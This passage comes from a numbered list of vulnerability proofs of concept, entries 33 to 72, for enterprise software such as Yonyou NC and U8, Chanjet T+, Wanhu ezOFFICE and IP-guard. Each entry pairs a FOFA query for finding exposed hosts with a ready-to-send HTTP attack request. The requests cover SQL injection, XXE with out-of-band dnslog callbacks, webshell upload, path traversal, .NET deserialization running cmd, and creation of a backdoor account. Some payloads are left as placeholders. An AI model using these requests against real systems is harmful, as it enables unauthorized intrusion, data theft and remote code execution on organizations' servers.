User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version:NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong (云时空) social commerce ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it executes a command that writes the given string into the given file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the interface
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: with the obtained Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "StartInfo": {
           "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
           "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
       }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. Byzoro (百卓) Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. Zheda Ente (浙大恩特) customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then access:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. Jiecheng (捷诚) management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. Youkate (优卡特) Lianaiyun face-recognition smart management platform 1.0.55.0.0.1 permission bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
An HTTP 200 response means the account test123456/123456 has been created.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. Wanhu (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The vulnerability is confirmed if lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9.

67. Wanhu (万户) ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, dir sets the directory it is written to, and fileType sets the file extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. Wanhu (万户) ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. Wanhu (万户) ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. Wanhu (万户) ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. Bangyong (邦永) PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. Seeyon (致远) OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

